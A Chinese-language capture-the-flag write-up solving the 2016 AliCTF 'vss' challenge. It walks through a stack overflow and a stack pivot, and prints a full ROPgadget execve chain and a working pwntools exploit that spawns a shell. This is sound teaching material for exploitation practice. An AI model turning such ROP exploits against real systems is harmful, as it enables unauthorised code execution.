2016 AliCTF : vss [下载地址]

题目分析

首先检查一下程序保护

1566655772692

只开启了NX保护,而且程序是64位的

运行一下

1566655810306

发现需要密码……直接丢到IDA里面查看,加载用了一段时间,程序有一丢丢大

1566656792830

打开之后也直接懵逼了,程序不像是我们之前所见到的那样,而是包含了大量的函数,猜测文件可能是静态编译,把所有用到的库函数都放在了一个文件里面进行编译

在linux里面用file检查,果然是静态链接

1566656957749

在IDA里面有一个start函数,猜测是程序开始的地方,但是一阵乱点之后也没找到程序执行的内容在哪,想起IDA可以通过字符串查询,Ctrl+T搜索Password:

1566657136574

终于找到了程序真正开始的地方,可以对一些函数功能进行猜测然后对其命名,方便后边的分析查看。根据程序的流程可以猜测sub_408800是puts函数,sub_437EA0是read函数,在这里最大可以读取1024字节的数据,数据被读入到v1中,可以将其命名为str。str的缓冲区有400h=1024个字节,所以这里并不会产生溢出漏洞

1566658368407

我们进入到sub_40108E继续查看

1566658810310

看到sub_400330函数的形式比较熟悉,很像字符串拷贝的函数,将str的内容复制到v2中最大长度为80个字节,而在IDA中可以看出v2的最大缓冲只有40h=64个字节,所以此处很可能是程序缓冲区漏洞所在,但是留给我们可以使用的shellcode空间只有80-64=16个字节,远远小于我们可以使用的最小的shellcode空间,对于64位的程序,刚好覆盖到函数ret的返回地址。想到上一个函数拥有1024Bytes的空间,我们可以控制rsp移动将栈转移到上一个函数的空间中。

代码利用

1. 控制rsp

因为父函数的栈空间在子函数栈空间的上方,所以要想将栈转移到父函数空间中,需要将rsp指针上移

找一下add rsp的gadget

1566830818973

由于子函数的可写入数据为80个字节大小,所以我们要将rsp增加80以上,符合条件的我们可以使用0x000000000046f205 : add rsp, 0x58 ; ret这一个gadget

2. 寻找shellcode

构造shellcode可以使用ROPgadget的ropchain功能

输入ROPgadget --binary vss --ropchain就可以自动生成一个可以使用的ropchain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets

	[+] Gadget found: 0x46b8d1 mov qword ptr [rsi], rax ; ret
	[+] Gadget found: 0x401937 pop rsi ; ret
	[+] Gadget found: 0x46f208 pop rax ; ret
	[+] Gadget found: 0x41bd1f xor rax, rax ; ret

- Step 2 -- Init syscall number gadgets

	[+] Gadget found: 0x41bd1f xor rax, rax ; ret
	[+] Gadget found: 0x45e790 add rax, 1 ; ret
	[+] Gadget found: 0x45e791 add eax, 1 ; ret

- Step 3 -- Init syscall arguments gadgets

	[+] Gadget found: 0x401823 pop rdi ; ret
	[+] Gadget found: 0x401937 pop rsi ; ret
	[+] Gadget found: 0x43ae05 pop rdx ; ret

- Step 4 -- Syscall gadget

	[+] Gadget found: 0x4004b8 syscall

- Step 5 -- Build the ROP chain

	#!/usr/bin/env python2
	# execve generated by ROPgadget

	from struct import pack

	# Padding goes here
	p = ''

	p += pack('<Q', 0x0000000000401937) # pop rsi ; ret
	p += pack('<Q', 0x00000000006c4080) # @ .data
	p += pack('<Q', 0x000000000046f208) # pop rax ; ret
	p += '/bin//sh'
	p += pack('<Q', 0x000000000046b8d1) # mov qword ptr [rsi], rax ; ret
	p += pack('<Q', 0x0000000000401937) # pop rsi ; ret
	p += pack('<Q', 0x00000000006c4088) # @ .data + 8
	p += pack('<Q', 0x000000000041bd1f) # xor rax, rax ; ret
	p += pack('<Q', 0x000000000046b8d1) # mov qword ptr [rsi], rax ; ret
	p += pack('<Q', 0x0000000000401823) # pop rdi ; ret
	p += pack('<Q', 0x00000000006c4080) # @ .data
	p += pack('<Q', 0x0000000000401937) # pop rsi ; ret
	p += pack('<Q', 0x00000000006c4088) # @ .data + 8
	p += pack('<Q', 0x000000000043ae05) # pop rdx ; ret
	p += pack('<Q', 0x00000000006c4088) # @ .data + 8
	p += pack('<Q', 0x000000000041bd1f) # xor rax, rax ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
	p += pack('<Q', 0x00000000004004b8) # syscall

生成的ropchain有点长,但也完全适合我们的题目要求

3. 编写exp

再次观察子函数的源代码

1566831279543

可以发现,如果前两个字符为‘py’可以直接使程序返回而不用执行下面一堆乱七八糟的东西,所以我们可以只关注这一小段代码,从int v2; // [rsp+10h] [rbp-40h]可以推断出,需要填充的无用数据为0x40+8=0x48个字节,由于最开始两个字节已经固定为‘py’,所以我们还需要填充0x46个字节。接着就是我们找到的add rsp的地址,再往上就是我们主函数的栈空间。由于子函数我们使用的栈空间的80个字节是从主函数栈空间的前80个字节拷贝过来的,所以主函数的栈空间中,前80个字节已经固定了,要想ret到我们的shellcode,还需要再填充0x58-80=8个字节

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from pwn import *
from struct import pack
sh = process('./vss')

# Padding goes here
p = ''

p += pack('<Q', 0x0000000000401937) # pop rsi ; ret
p += pack('<Q', 0x00000000006c4080) # @ .data
p += pack('<Q', 0x000000000046f208) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000046b8d1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401937) # pop rsi ; ret
p += pack('<Q', 0x00000000006c4088) # @ .data + 8
p += pack('<Q', 0x000000000041bd1f) # xor rax, rax ; ret
p += pack('<Q', 0x000000000046b8d1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401823) # pop rdi ; ret
p += pack('<Q', 0x00000000006c4080) # @ .data
p += pack('<Q', 0x0000000000401937) # pop rsi ; ret
p += pack('<Q', 0x00000000006c4088) # @ .data + 8
p += pack('<Q', 0x000000000043ae05) # pop rdx ; ret
p += pack('<Q', 0x00000000006c4088) # @ .data + 8
p += pack('<Q', 0x000000000041bd1f) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004004b8) # syscall

add_rsp = 0x000000000046f205 # add rsp, 0x58 ; ret
payload = 'py' + 'a'*(0x40 + 8 - 2) + p64(add_rsp) + 'b'*(0x58 - 80) + p

sh.sendline(payload)
sh.interactive()

成功获得shell

1566832144335

需要注意的地方:

这里的shellcode只能由ropchain自动生成,或者自己手动编写,因为这是静态链接程序,不能使用shellcraft或者其他现成的shellcode来构造